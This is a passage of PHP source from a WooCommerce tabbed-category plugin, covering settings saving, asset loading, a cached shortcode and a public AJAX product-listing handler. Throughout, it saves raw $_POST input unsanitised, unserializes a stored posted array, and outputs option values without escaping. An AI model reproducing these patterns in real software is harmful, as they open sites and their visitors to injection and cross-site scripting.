                update_option('qc_woo_tabbed_display_rtl_support', $qc_woo_tabbed_display_rtl_support);

                $qc_woo_tabbed_display_default_template_sidebar = $_POST['qc_woo_tabbed_display_default_template_sidebar'];

                update_option('qc_woo_tabbed_display_default_template_sidebar', $qc_woo_tabbed_display_default_template_sidebar);

                $qc_woo_tabbed_eleven_parent_category_clickable = $_POST['qc_woo_tabbed_eleven_parent_category_clickable'];

                update_option('qc_woo_tabbed_eleven_parent_category_clickable', $qc_woo_tabbed_eleven_parent_category_clickable);

                $qc_woo_tabbed_scroll_category_clickable = $_POST['qc_woo_tabbed_scroll_category_clickable'];

                update_option('qc_woo_tabbed_scroll_category_clickable', $qc_woo_tabbed_scroll_category_clickable);

                $qc_woo_tabbed_columns_mobile_product_view = $_POST['qc_woo_tabbed_columns_mobile_product_view'];

                update_option('qc_woo_tabbed_columns_mobile_product_view', $qc_woo_tabbed_columns_mobile_product_view);

                $qc_woo_tabbed_product_hover_gallery_image = $_POST['qc_woo_tabbed_product_hover_gallery_image'];

                update_option('qc_woo_tabbed_product_hover_gallery_image', $qc_woo_tabbed_product_hover_gallery_image);

                $qc_woo_tabbed_shortcode_preview = isset( $_POST['qc_woo_tabbed_shortcode_preview'] ) ? $_POST['qc_woo_tabbed_shortcode_preview'] : '';

                update_option('qc_woo_tabbed_shortcode_preview', $qc_woo_tabbed_shortcode_preview);

                $qc_woo_tabbed_display_category_url_based = $_POST['qc_woo_tabbed_display_category_url_based'];

                update_option('qc_woo_tabbed_display_category_url_based', $qc_woo_tabbed_display_category_url_based);

                
                update_option('qc_product_sort_type', $qc_product_sort_type);
                update_option('qc_product_sort_order', $qc_product_sort_order);

                update_option('product_content_text_color', $product_content_text_color);
                update_option('product_add_to_cart_button_color', $product_add_to_cart_button_color);
                update_option('product_category_filter_button_color_hover', $product_category_filter_button_color_hover);
                update_option('product_category_filter_button_color', $product_category_filter_button_color);


                update_option('product_ratting_color', $product_ratting_color);

                update_option('product_category_text_font_size', $product_category_text_font_size);
                update_option('product_category_text_font_color', $product_category_text_font_color);
                update_option('product_category_button_active_color', $product_category_button_active_color);
                update_option('change_add_to_cart_button_text', $change_add_to_cart_button_text);


                update_option('qc_add_to_cart_type', $qc_add_to_cart_type);
                update_option('qc_slick_slider_on_off', $qc_slick_slider_on_off);
                update_option('qc_quick_view_on_off', $qc_quick_view_on_off);
                update_option('qc_quick_sorting_on_off', $qc_quick_sorting_on_off);
                update_option('qc_category_filter_fixed_on_off', $qc_category_filter_fixed_on_off);
                update_option('qc_woo_tabbed_cart_summary_style', $qc_woo_tabbed_cart_summary_style);
                //update_option('qc_woo_tabbed_cart_summary_style', str_replace('\\', '', $qc_woo_tabbed_cart_summary_style ));


                update_option('qc_woo_tabbed_cart_summary_position', $qc_woo_tabbed_cart_summary_position);
                update_option('qc_woo_tabbed_cart_show_page', $qc_woo_tabbed_cart_show_page);


                //update_option('custom_global_css', $custom_global_css);
                update_option('custom_global_css', str_replace('\\', '', $custom_global_css ));
                update_option('product_number', $product_number);
                update_option('hot_deals_product_number', $hot_deals_product_number);
                update_option('qcld_category_top_tooltip_show', $qcld_category_top_tooltip_show);
                update_option('qcld_product_search_box_for_quick_search', $qcld_product_search_box_for_quick_search);
                update_option('qcld_product_search_box_each_category', $qcld_product_search_box_each_category);

                update_option('display_price', $display_price);
                update_option('display_rating', $display_rating);
                update_option('product_title', $product_title);
                update_option('add_cart_link', $add_cart_link);
                update_option('add_quantity_select', $add_quantity_select);
                update_option('success_alert_message', $success_alert_message);
                update_option('title_text', $title_text);
                update_option('change_load_more_text', $change_load_more_text);
                update_option('change_all_category_button_text', $change_all_category_button_text);
                update_option('container_background_color', $container_background_color);
                update_option('product_title_text_color', $product_title_text_color);
                update_option('max_char_per_cat', $max_char_per_cat);
                update_option('change_title_text_size', $change_title_text_size);
                update_option('product_content_text_size', $product_content_text_size);

                update_option('tabbed_theme', $tabbed_theme);



                $qcld_slick_slider_number = $_POST['qcld_slick_slider_number'];
                update_option('qcld_slick_slider_number', $qcld_slick_slider_number);

                $qcld_slick_slider_number_mobile = $_POST['qcld_slick_slider_number_mobile'];
                update_option('qcld_slick_slider_number_mobile', $qcld_slick_slider_number_mobile);

                $qcld_twelve_slick_slider_number = $_POST['qcld_twelve_slick_slider_number'];
                update_option('qcld_twelve_slick_slider_number', $qcld_twelve_slick_slider_number);

                $qcld_default_theme_column_number = $_POST['qcld_default_theme_column_number'];
                update_option('qcld_default_theme_column_number', $qcld_default_theme_column_number);

                $qcld_twelve_slick_slider_center_mode = $_POST['qcld_twelve_slick_slider_center_mode'];
                update_option('qcld_twelve_slick_slider_center_mode', $qcld_twelve_slick_slider_center_mode);

                $qc_slick_slider_auto_scroll_on_off = $_POST['qc_slick_slider_auto_scroll_on_off'];
                update_option('qc_slick_slider_auto_scroll_on_off', $qc_slick_slider_auto_scroll_on_off);

                $qc_slick_slider_auto_scroll_infinite_on_off = $_POST['qc_slick_slider_auto_scroll_infinite_on_off'];
                update_option('qc_slick_slider_auto_scroll_infinite_on_off', $qc_slick_slider_auto_scroll_infinite_on_off);

                $qcld_woo_tabbed_change_loading_image = isset($_POST['qcld_woo_tabbed_change_loading_image']) ? $_POST['qcld_woo_tabbed_change_loading_image'] : '';
                update_option('qcld_woo_tabbed_change_loading_image', $qcld_woo_tabbed_change_loading_image);

                $qcld_woo_tabbed_show_category_dropdown = isset($_POST['qcld_woo_tabbed_show_category_dropdown']) ? $_POST['qcld_woo_tabbed_show_category_dropdown'] : '';
                update_option('qcld_woo_tabbed_show_category_dropdown', $qcld_woo_tabbed_show_category_dropdown);

                $qcld_woo_tabbed_board_bg_path = $_POST['qcld_woo_tabbed_board_bg_path'];
                update_option('qcld_woo_tabbed_board_bg_path', $qcld_woo_tabbed_board_bg_path);

                $qc_category_filter_fixed_full_page_on_off = $_POST['qc_category_filter_fixed_full_page_on_off'];
                update_option('qc_category_filter_fixed_full_page_on_off', $qc_category_filter_fixed_full_page_on_off);


                if (isset($_POST["qc_woo_tabbed_cart_show_pages_list"])) {
                    $qc_woo_tabbed_cart_show_pages_list = $_POST["qc_woo_tabbed_cart_show_pages_list"];
                    update_option('qc_woo_tabbed_cart_show_pages_list', serialize($qc_woo_tabbed_cart_show_pages_list));
                }

                // minify 
                //if (isset($_POST["qcld_woo_tabbed_defer_load_js"])) {
                    $qcld_woo_tabbed_defer_load_js = isset($_POST["qcld_woo_tabbed_defer_load_js"]) ? $_POST["qcld_woo_tabbed_defer_load_js"] : '';
                    update_option('qcld_woo_tabbed_defer_load_js', $qcld_woo_tabbed_defer_load_js);
                //}

               // if (isset($_POST["qcld_woo_tabbed_optimize_js_code"])) {
                    $qcld_woo_tabbed_optimize_js_code = isset($_POST["qcld_woo_tabbed_optimize_js_code"]) ? $_POST["qcld_woo_tabbed_optimize_js_code"] : '';
                    update_option('qcld_woo_tabbed_optimize_js_code', $qcld_woo_tabbed_optimize_js_code);
                //}

               // if (isset($_POST["qcld_woo_tabbed_optimize_css_code"])) {
                    $qcld_woo_tabbed_optimize_css_code = isset($_POST["qcld_woo_tabbed_optimize_css_code"]) ? $_POST["qcld_woo_tabbed_optimize_css_code"] : '';
                    update_option('qcld_woo_tabbed_optimize_css_code', $qcld_woo_tabbed_optimize_css_code);
                //}

               // if (isset($_POST["qcld_woo_tabbed_enable_cache"])) {
                    $qcld_woo_tabbed_enable_cache = isset($_POST["qcld_woo_tabbed_enable_cache"]) ? $_POST["qcld_woo_tabbed_enable_cache"] : '';
                    update_option('qcld_woo_tabbed_enable_cache', $qcld_woo_tabbed_enable_cache);
                //}

                //if (isset($_POST["qcld_woo_tabbed_regenerate_cache_time"])) {
                    $qcld_woo_tabbed_regenerate_cache_time = isset($_POST["qcld_woo_tabbed_regenerate_cache_time"]) ? $_POST["qcld_woo_tabbed_regenerate_cache_time"] : '';
                    update_option('qcld_woo_tabbed_regenerate_cache_time', $qcld_woo_tabbed_regenerate_cache_time);
                //}


            }
        }
    }


    /**
     * Display Notifications on specific criteria.
     *
     * @since    2.14
     */
    public static function woocommerce_inactive_notice()
    {
        if (current_user_can('activate_plugins')) :
            if (!class_exists('WooCommerce')) :
                deactivate_plugins(plugin_basename(__FILE__));
                //wp_die('You need to activate WooCommerce first.');
                ?>
                <style>
                    .updated {
                        display: none !important;
                    }
                </style>
                <div id="message" class="error">
                    <p>
                        <?php
                        printf(
                            __('%sWoo Tabbed Category Product Listing - Premium Edition REQUIRES WooCommerce%s %sWooCommerce%s must be active for Woo Tabbed Category Product Listing - Premium Edition to work. Please install & activate WooCommerce.', 'woo-tabbed-category'),
                            '<strong>',
                            '</strong><br>',
                            '<a href="http://wordpress.org/extend/plugins/woocommerce/" target="_blank" >',
                            '</a>'
                        );
                        ?>
                    </p>
                </div>
                <?php
            elseif (version_compare(get_option('woocommerce_db_version'), WOO_PRODUCT_TAB_VERSION, '<')) :
                ?>
                <div id="message" class="error">
                    <p>
                        <?php
                        printf(
                            __('%sWoo Tabbed Category Product Listing - Premium Edition is inactive%s This version of Woo Tabbed Category Product Listing - Premium Edition requires WooCommerce %s or newer. For more information about our WooCommerce version support %sclick here%s.', 'woo-tabbed-category'),
                            '<strong>',
                            '</strong><br>',
                            WOO_PRODUCT_TAB_VERSION,
                            WOO_PRODUCT_TAB_VERSION,
                            WOO_PRODUCT_TAB_VERSION,
                            WOO_PRODUCT_TAB_VERSION,
                            WOO_PRODUCT_TAB_VERSION
                        );
                        ?>
                    </p>
                    <div style="clear:both;"></div>
                </div>
                <?php
            endif;
        endif;
    }


}


if (!function_exists('init_woo_tab_cat_list')) {
    function init_woo_tab_cat_list()
    {

        global $woo_tab_cat_list;

        $woo_tab_cat_list = Woo_Tab_pro_Product_Category_List::get_instance();
    }
}


add_action('plugins_loaded', 'init_woo_tab_cat_list');




/**
 * Check first if WooCommerce is activated or not
 */

// Plugin Code Below

require_once(plugin_dir_path(__FILE__) . 'class-woo-tabbed-category-product-listing.php');


function woo_tabbed_category_starts()
{

    if(isset($_GET['page']) && $_GET['page']=='woo-tab'){
        
        $tabbed_category = new Woo_Tabbled_pro_Categoty();
        $tabbed_category->initialize();

    }


}

woo_tabbed_category_starts();


/**
 * Loading the plugin specific javascript files.
 */


function wtcpl_pro_plugin_scriptss()
{

    if (is_admin()) {
        return;
    }
    
    wp_enqueue_script('jquery');
    wp_enqueue_script( 'wc-add-to-cart-variation' );

    wp_enqueue_script('magnific-popup-js', plugins_url('/js/qcld-express-jquery.magnific-popup.min.js', __FILE__), array('jquery'));

    wp_enqueue_script('lightslider-js', plugins_url('/js/qcld-express-lightslider.js', __FILE__), array('jquery'));

    wp_enqueue_script('slick-js', plugins_url('/js/slick.min.js', __FILE__), array('jquery'));
    wp_enqueue_script('masonry-js', plugins_url('/js/qcld-masonry.js', __FILE__), array('jquery'));
    wp_enqueue_script('wtcpl-product-details-js', plugins_url('/js/qcld-woo-tabbed-pro-details.js', __FILE__), array('jquery'));

    if(get_option('qc_woo_tabbed_display_category_url_based') == 'enable'){

        wp_enqueue_script('wtcpl-url-load-js', plugins_url('/js/wtcpl-scripts-load-tag.js', __FILE__), array('jquery'));
    }


    if(get_option('qc_woo_tabbed_product_loading_style') == 'infinite'){

        wp_enqueue_script('wtcpl-load-infinite-js', plugins_url('/js/woo-tabbed-load-infinite.js', __FILE__), array('jquery'));
    }

    wp_enqueue_script('wtcpl-product-cat-js', plugins_url('/js/wtcpl-scripts.js', __FILE__), array('jquery','wc-add-to-cart-variation'));
    wp_enqueue_script('sweetalert2-js', plugins_url('/js/sweetalert2.js', __FILE__), array('jquery'));


    if( esc_html(wp_get_theme()->get('Name')) == 'Avada' ){

    }else if( esc_html(wp_get_theme()->get('Name')) == 'Avada-Child' ){

    }else if( esc_html(wp_get_theme()->get('Name')) == 'Avada Child' ){

    }else if( esc_html(wp_get_theme()->get('Name')) == 'Avada Child Theme' ){

    }else{

        wp_enqueue_script('modernizr', plugins_url('/js/modernizr.custom.js', __FILE__), array());

    }

    wp_enqueue_script('catslider', plugins_url('/js/jquery.catslider.js', __FILE__), array('jquery'));
    wp_enqueue_script('sticky-js', plugins_url('/js/qcld-wootab-jquery.sticky.js', __FILE__), array('jquery'));
    wp_enqueue_script('floating-cart-js', plugins_url('/js/qcld-woo-tabbed-floating.js', __FILE__), array('jquery'));


}

function wtcpl_pro_scroll_to_scriptss(){

    wp_enqueue_script('wtcpl-scroll-to-js', plugins_url('/js/jquery.scrollTo-1.4.3.1-min.js', __FILE__), array('jquery'));
    wp_enqueue_script('jquery-id-tabs', plugins_url('/js/jquery.idTabs.min.js', __FILE__), array('jquery'));
}


/**
 * Loading the plugin specific stylesheet files.
 */

function wtcpl_pro_plugin_styles()
{

    if (is_admin()) {
        return;
    }

    wp_register_style('sweetalert2', plugin_dir_url(__FILE__) . 'css/sweetalert2.css');
    wp_enqueue_style('sweetalert2');

    wp_register_style('flickity', plugin_dir_url(__FILE__) . 'css/flickity.css');
    wp_enqueue_style('flickity');

    wp_register_style('slick-css', plugin_dir_url(__FILE__) . 'css/slick.css');
    wp_enqueue_style('slick-css');

    wp_register_style('qcld-font-awesomes', plugin_dir_url(__FILE__) . 'css/font-awesome.css');
    wp_enqueue_style('qcld-font-awesomes');

    wp_register_style('animate-css', plugin_dir_url(__FILE__) . 'css/qcld-express-animate.css');
    wp_enqueue_style('animate-css');

    wp_register_style('lightslider-css', plugin_dir_url(__FILE__) . 'css/qcld-express-lightslider.css');
    wp_enqueue_style('lightslider-css');

    wp_register_style('magnific-popup-css', plugin_dir_url(__FILE__) . 'css/qcld-express-magnific-popup.css');
    wp_enqueue_style('magnific-popup-css');

    wp_register_style('quick-view-css', plugin_dir_url(__FILE__) . 'css/qcld-express-quick-view.css');
    wp_enqueue_style('quick-view-css');

    wp_register_style('floating-cart-css', plugin_dir_url(__FILE__) . 'css/qcld-woo-tabbed-floating.css');
    wp_enqueue_style('floating-cart-css');

    wp_register_style('frontend-style-css', plugin_dir_url(__FILE__) . 'css/frontend-style.css');
    wp_enqueue_style('frontend-style-css');

    $qc_woo_tabbed_enable_related_product_replace = get_option('qc_woo_tabbed_enable_related_product_replace');

    if ( ( isset( $qc_woo_tabbed_enable_related_product_replace ) && !empty( $qc_woo_tabbed_enable_related_product_replace ) ) ) {

        $css = '.related.products {
            display: none !important;
            }';

        wp_add_inline_style( 'frontend-style-css', $css );
        
    }
    
    wp_register_style('fancy-style', plugin_dir_url(__FILE__) . 'css/qcld-express-jquery.fancybox.min.css');
    wp_enqueue_style('fancy-style');


    if(empty(get_option('qc_woo_tabbed_columns_mobile_product_view')) && get_option('qc_woo_tabbed_columns_mobile_product_view') == ''){

        wp_register_style('mobile-product-column-css', plugin_dir_url(__FILE__) . 'css/mobile-product-column-one-style.css');
        wp_enqueue_style('mobile-product-column-css');

    }

    if(!empty(get_option('qc_woo_tabbed_columns_mobile_product_view')) && get_option('qc_woo_tabbed_columns_mobile_product_view') == 'two'){

        wp_register_style('mobile-product-column-css', plugin_dir_url(__FILE__) . 'css/mobile-product-column-two-style.css');
        wp_enqueue_style('mobile-product-column-css');

    }


}


add_action('template_redirect', 'wtcpl_pro_check_for_shorcode');
function wtcpl_pro_check_for_shorcode()
{
   


    $qc_woo_tabbed_cart_show_page = get_option('qc_woo_tabbed_cart_show_page');
    if(isset($qc_woo_tabbed_cart_show_page) && $qc_woo_tabbed_cart_show_page == 'global'):

        if (is_admin() || is_cart() || is_checkout()) {
            return;
        }

        wtcpl_pro_scroll_to_scriptss();
        wtcpl_pro_plugin_scriptss();
        wtcpl_pro_plugin_styles();
        qcld_woo_tabbed_plugin_enqueue_scripts();

        $qc_woo_tabbed_cart_summary_style = get_option('qc_woo_tabbed_cart_summary_style');

        if(isset($qc_woo_tabbed_cart_summary_style) && $qc_woo_tabbed_cart_summary_style != 'off'):
            add_action('wp_footer', 'qcld_woo_tabbed_float_cart_global');
        endif;

    elseif(isset($qc_woo_tabbed_cart_show_page) && $qc_woo_tabbed_cart_show_page == 'selected'):

         $qc_woo_tabbed_cart_show_pages_list=unserialize(get_option('qc_woo_tabbed_cart_show_pages_list'));
            if(!empty($qc_woo_tabbed_cart_show_pages_list) ){
                if(in_array(get_the_ID(), $qc_woo_tabbed_cart_show_pages_list) == true){
                    
                    wtcpl_pro_scroll_to_scriptss();
                    wtcpl_pro_plugin_scriptss();
                    wtcpl_pro_plugin_styles();
                    qcld_woo_tabbed_plugin_enqueue_scripts();

                    $qc_woo_tabbed_cart_summary_style = get_option('qc_woo_tabbed_cart_summary_style');

                    if(isset($qc_woo_tabbed_cart_summary_style) && $qc_woo_tabbed_cart_summary_style != 'off'):
                        add_action('wp_footer', 'qcld_woo_tabbed_float_cart_global');
                    endif;


                }
            }



    endif;

   

}

/**
 * Register the shortcode
 */

add_shortcode('wtcpl-product-cat', 'wtcpl_pro_load_products');
function wtcpl_pro_load_products($atts)
{

    ob_start();
    global $qc_shortcode_parameters;
    $qc_shortcode_parameters = $atts;

    $qc_woo_tabbed_shortcode_preview = get_option('qc_woo_tabbed_shortcode_preview');

    if($qc_woo_tabbed_shortcode_preview == 'enable'){

        if (is_admin()) {
            return;
        }

    }

    $qc_woo_tabbed_cart_show_page = get_option('qc_woo_tabbed_cart_show_page');
    if(isset($qc_woo_tabbed_cart_show_page) && $qc_woo_tabbed_cart_show_page == 'single'):

        wtcpl_pro_scroll_to_scriptss();
        wtcpl_pro_plugin_scriptss();
        wtcpl_pro_plugin_styles();
        qcld_woo_tabbed_plugin_enqueue_scripts();

        $qc_woo_tabbed_cart_summary_style = get_option('qc_woo_tabbed_cart_summary_style');

        if(isset($qc_woo_tabbed_cart_summary_style) && $qc_woo_tabbed_cart_summary_style != 'off'):

            add_action('wp_footer', 'qcld_woo_tabbed_float_cart_global');

        endif;
    elseif(isset($qc_woo_tabbed_cart_show_page) && $qc_woo_tabbed_cart_show_page == 'selected'):

        wtcpl_pro_scroll_to_scriptss();
        wtcpl_pro_plugin_scriptss();
        wtcpl_pro_plugin_styles();
        qcld_woo_tabbed_plugin_enqueue_scripts();

    endif;

    add_action( 'wp_footer', 'wtcp_slick_slider_active_function' );

    // if shortcode parameter is empty then default work theme One.
    if (!empty($qc_shortcode_parameters['theme'])) {
    //if (array_key_exists('theme', $qc_shortcode_parameters)) {
        $qc_shortcode_parameters = $atts;
    }else{
        $theme_number = get_option('tabbed_theme');
        $qc_shortcode_parameters = array("theme" => $theme_number);
    }


    // Prevent rendering plugin if user is

    

   // if (!is_admin()) {


        $qcld_woo_tabbed_enable_cache = get_option('qcld_woo_tabbed_enable_cache');
        $qcld_woo_tabbed_regenerate_cache_time = get_option('qcld_woo_tabbed_regenerate_cache_time') ? get_option('qcld_woo_tabbed_regenerate_cache_time') : 3000;

        $qcld_template_results_cache = $qc_shortcode_parameters['theme'] ? $qc_shortcode_parameters['theme']: get_option('tabbed_theme');
   
        $cache_key = 'qcld_express_template_results_cache_'.$qcld_template_results_cache;
        $clean = get_transient($cache_key);

        // if cache is not enable from admin set cache from here.. 
        if( isset($qcld_woo_tabbed_enable_cache) && ($qcld_woo_tabbed_enable_cache != 1) ) {
            delete_transient( $cache_key );
        }
        // qcld_express_enable_cache
        if($clean === false){
            // var_dump($cache_key);
            ob_start();

            if ($atts != '') {
                //if ($atts['theme'] != '') {
                    if (file_exists(QC_WOO_TAB_DIR . '/templates/template-' . $qc_shortcode_parameters['theme'] . '/template.php')) {
                        $template = QC_WOO_TAB_DIR . '/templates/template-' . $qc_shortcode_parameters['theme'] . '/template.php';
                        require($template); 
                    }else{

                    }
               // }

            }else{

                require(QC_WOO_TAB_DIR . '/templates/template-' . get_option('tabbed_theme') . '/template.php');
                
            }
            $clean = ob_get_clean();

            // if cache is enable from admin set cache from here.. 
            if( isset($qcld_woo_tabbed_enable_cache) && ($qcld_woo_tabbed_enable_cache == 1) ) {

                set_transient( $cache_key, $clean, $qcld_woo_tabbed_regenerate_cache_time );
            }

        }
        
    //}

   // return ob_get_clean();
        
    return $clean;

}



// Ajax load products into tab for theme four

add_action('wp_ajax_get_products_by_cat_theme_four', 'get_products_by_cat_theme_four');
add_action('wp_ajax_nopriv_get_products_by_cat_theme_four', 'get_products_by_cat_theme_four');


function get_products_by_cat_theme_four()
{

    $post_per_page  = get_option('product_number');
    $cat_id         = isset( $_POST['cat_id'] ) ? $_POST['cat_id'] : '';
    $offset         = isset( $_POST['offset'] ) ? $_POST['offset'] : '';
    $show_sale      = isset( $_POST['show_sale'] ) ? $_POST['show_sale'] : '';
    $show_feature   = isset( $_POST['feature_only'] ) ? $_POST['feature_only'] : '';
    

    $qc_shortcode_parameters    = isset( $_POST['data_cat_parameter'] ) ? $_POST['data_cat_parameter'] : '';
    $category_ids               = isset( $_POST['data_cat_parameter'] ) ? $_POST['data_cat_parameter'] : '';
    $link_title_to_modal        = isset( $_POST['link_title_to_modal'] ) ? $_POST['link_title_to_modal'] : '';

    $sorting = '';
    $orderBy = get_option('qc_product_sort_type');
    if(get_option('qc_product_sort_type') == 'meta_value_num'){
        $sorting = '_price';
    }
    if( get_option('qc_product_sort_type') == 'total_sales' ){
        $sorting = 'total_sales';
        $orderBy = 'meta_value_num';
    }

    if ($cat_id == 'all') {

        $show_featured_only = array('relation' => 'OR', array(
            array(
                'taxonomy' => 'product_visibility',
                'field' => 'name',
                'terms' => 'featured',
                'operator' => 'IN'
            )
        ));


        $show_sale_products_only = array('relation' => 'OR', array( // Simple products type
            'key' => '_sale_price',
            'value' => 0,
            'compare' => '>',
            'type' => 'numeric'
        ),
            array( // Variable products type
                'key' => '_min_variation_sale_price',
                'value' => 0,
                'compare' => '>',
                'type' => 'numeric'
            ));


        $product_categories = unserialize(get_option('selected_categories'));
        $product_number = get_option('product_number');

        $category_orders = get_option('category_order');

        if($category_orders == 'menu_order'){
            $args = array(
            'hide_empty'    => 1,
            'order'         => 'asc',
            'exclude'       => $product_categories,
            'include'       => $category_ids,
            );

        }else{

             $args = array(
            'hide_empty'    => 1,
            'order'         => get_option('category_order'),
            'orderby'       => 'title',
            'exclude'       => $product_categories,
            'include'       => $category_ids,
            );

        }
        $product_categories = get_terms('product_cat', $args);


        /*$categories_all = array();
        foreach($product_categories as $termss){
            array_push($categories_all,$termss->term_id);
        }*/

        $categories_all = '';

        if (!empty($qc_shortcode_parameters) ) {
            $category_ids = $qc_shortcode_parameters;
            // convert the string into php array
            $categories_all = explode(',', $category_ids);

        } else {
            $categories_all = array();
            foreach($product_categories as $termss){
                array_push($categories_all,$termss->term_id);
            }
        }


        $args =  array_merge($args, array( 'tax_query' => array(
                            array(
                                'taxonomy' => 'product_visibility',
                                'field'    => 'name',
                                'terms'    => 'exclude-from-catalog',
                                'operator' => 'NOT IN',
                            ),
                    )));


        $args = array(
            'post_type'         => 'product',
            'posts_per_page'    => $post_per_page,
            'meta_key'          => $sorting,
            'orderby'           => $orderBy,
            'order'             => get_option('qc_product_sort_order'),
            'tax_query'         => array(
                'relation'      => 'OR',
                array(
                    'taxonomy'  => 'product_cat',
                    'field'     => 'term_id',
                    'terms'     => $categories_all,
                    'operator'  => 'IN'
                ),
            )
        );


        if ($show_sale == 1) {
            $args = array_merge($args, array('meta_query' => $show_sale_products_only));
        }

        if ($show_feature == 1) {

            $show_featured_only = array('relation' => 'OR', array(
                array(
                    'taxonomy' => 'product_cat',
                    'field' => 'term_id',
                    'terms' => $categories_all,
                    'operator' => 'IN'
                ),
                array(
                    'taxonomy' => 'product_visibility',
                    'field' => 'name',
                    'terms' => 'featured',
                    'operator' => 'IN'
                )
            ));
            $args = array_merge($args, array('tax_query' => $show_featured_only));
        }


    } else {


        $show_featured_only = array('relation' => 'OR', array(
            array(
                'taxonomy' => 'product_cat',
                'field' => 'term_id',
                'terms' => $cat_id,
                'operator' => 'IN'
            ),
            array(
                'taxonomy' => 'product_visibility',
                'field' => 'name',
                'terms' => 'featured',
                'operator' => 'IN'
            )
        ));


        $show_sale_products_only = array('relation' => 'OR', array( // Simple products type
            'key' => '_sale_price',
            'value' => 0,
            'compare' => '>',
            'type' => 'numeric'
        ),
            array( // Variable products type
                'key' => '_min_variation_sale_price',
                'value' => 0,
                'compare' => '>',
                'type' => 'numeric'
            ));

        $args = array(
            'post_type' => 'product',
            'post_status' => 'publish',
            'posts_per_page' => $post_per_page,
            'meta_key' => $sorting,
            'orderby' => $orderBy,
            'order' => get_option('qc_product_sort_order'),
//            'offset' => $offset,
            'tax_query' => array(
                'relation' => 'OR',
                array(
                    'taxonomy' => 'product_cat',
                    'field' => 'term_id',
                    'terms' => $cat_id,
                    'operator' => 'IN'
                ),
            )
        );

        if ($show_sale == 1) {
            $args = array_merge($args, array('meta_query' => $show_sale_products_only));
        }


        if ($show_feature == 1) {
            $args = array_merge($args, array('tax_query' => $show_featured_only));
        }

        $product_visibility = array('relation' => 'OR', array(
                array(
                    'taxonomy' => 'product_cat',
                    'field' => 'term_id',
                    'terms' => $cat_id,
                    'operator' => 'IN'
                ),
                 array(
                    'taxonomy' => 'product_visibility',
                    'field'    => 'name',
                    'terms'    => 'exclude-from-catalog',
                    'operator' => 'NOT IN',
                ),
            ));

        $args = array_merge($args, array('tax_query' => $product_visibility));

    }

    if(get_option('qc_woo_tabbed_disable_product_out_of_stock') == 'enable'){

        $args = array_merge($args, array( 'meta_query' => array(
                array(
                    'key'       => '_stock_status',
                    'value'     => 'instock',
                ),
        )));
    
    }

    if(class_exists('QCLD_WooCommerce_Role_Based_Price_Product_Pricing')){
        $rolebased = new QCLD_WooCommerce_Role_Based_Price_Product_Pricing(true);
        $rolebased->wc_init();
    }


    $product_query = new WP_Query($args);
    $number_of_product = $product_query->post_count;
    $wc_pf = new WC_Product_Factory();
    $html = '';

    $add_to_cart_text = get_option('change_add_to_cart_button_text');
    while ($product_query->have_posts()) : $product_query->the_post();
        $product = wc_get_product(get_the_ID());
        $product_stock_status = $product->get_stock_status();
        $html .= '<li  class="'.qcld_product_product_has_gallery( get_the_ID() ).'" style="background-color:' . get_option('container_background_color') . '"><div class="qc-product-list">';
        if ($product->is_on_sale()):
            $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
        endif;
        if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
        $html .= '<div class="qc-product-details-left"><a href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail($product->get_id()). '</a></div><div class="qc-product-details-right">';
            }else{ 
        $html .= '<div class="qc-product-details-left"><a href="' . $product->get_permalink() . '">' . $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail($product->get_id()). '</a></div><div class="qc-product-details-right">';
            }

        if (get_option('product_title') == 1):
            if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
            $html .= '<h2><a style="color: ' . get_option('product_title_text_color') . ';font-size: ' . get_option('change_title_text_size') . 'px;" href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a></h2>';
            }else{ 
            $html .= '<h2><a style="color: ' . get_option('product_title_text_color') . ';font-size: ' . get_option('change_title_text_size') . 'px;" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
            }
        endif;

        
        if( !empty(strip_tags($product->get_short_description()))){
        $html .= '<div class="tpl_four_short_desc" style="font-size: '.get_option('product_content_text_size').'px; color: '.get_option('product_content_text_color').' !important;">'.strip_tags($product->get_short_description()).'</div>';
        }


            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
        $average = $product->get_average_rating();

        if (get_option('display_rating') == 1):
            $html .= '<div class="qcld_woo_product_rating">';
            if ($average == 1) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
            } else if ($average == 0) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
            } else if ($average <= 2) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
            } else if ($average <= 3) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
            } else if ($average <= 4) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
            } else if ($average <= 5) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
            }
            $html .= '</div>';

        endif;

            $html .= '<h3 style="font-size: ' . get_option('product_content_text_size') . 'px;color:' . get_option('product_content_text_color') . '">';
        if (get_option('display_price') == 1):
            $html .=  $product->get_price_html();
        endif;

            if(get_option('qc_quick_view_on_off') != 'off'): 
            $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                    <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
            endif; 

        $html .= '</h3>';

        if (get_option('add_cart_link') == 1):
            if ($product_stock_status != 'outofstock') {
                if (!empty($add_to_cart_text)) {
                    $anchorText = '<i class="fa fa-cart-arrow-down" aria-hidden="true"></i>';
                } else {
                    $anchorText = '<i class="fa fa-cart-arrow-down" aria-hidden="true"></i>';
                }


                if (get_option('add_quantity_select') == 1):
                    if ($product->get_type() != 'variable'):

                         $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
